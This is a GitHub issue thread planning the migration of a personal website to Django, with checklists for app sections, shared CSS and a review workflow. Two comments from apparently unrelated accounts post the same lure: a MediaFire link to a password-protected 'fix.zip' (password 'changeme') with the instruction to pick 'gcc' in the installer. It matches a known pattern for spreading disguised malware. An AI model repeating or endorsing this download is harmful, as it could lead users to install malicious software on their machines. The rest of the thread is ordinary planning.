### ISSUE TITLE
Determine & Map Out Items to Migrate for Django

### ISSUE THREAD

**Issue by ProsperousHeart** [ProsperousHeart/ProsperousHeart.github.io#63]
Determine what pieces need to be made into their own "app" for this Django project.

Use [this Miro board](https://miro.com/app/board/uXjVKmMz_B8=/?share_link_id=512580668086) for planning.

- [x] Prepare the Django site with all of the apps setup as empty apps ready to be updated.
- [x] determine section (project app) requirements
- [x] set up tickets for [sections](https://github.com/ProsperousHeart/ProsperousHeart.github.io/issues/63#issuecomment-2309339278) as outlined of requirements from [here](https://github.com/ProsperousHeart/ProsperousHeart.github.io/issues/63#issuecomment-2311301074)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ProsperousHeart** [comment]
This may change in the future, but this is the plan:
![image](https://github.com/user-attachments/assets/cca69048-f28e-4c05-b2bf-fc0c09e8d527)

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ProsperousHeart** [comment]
For the main project:

1. Determine what the base CSS is that the Django templates will all pull from (see `source/containers`)
2. fix broken / old CSS - ensure they are consistent across sections

Requirements for each section:

1. Since these links are not going external & will stay on the single page, need to set URK in the main project to the section on the page
2. determine what model (if any) is required for the project app (site section)
3. build the HTML view & model (as needed)
4. add CSS for the section
5. once ready, leave in REVIEW (see [board](https://github.com/users/ProsperousHeart/projects/5)) until other sections are added to confirm interactivity
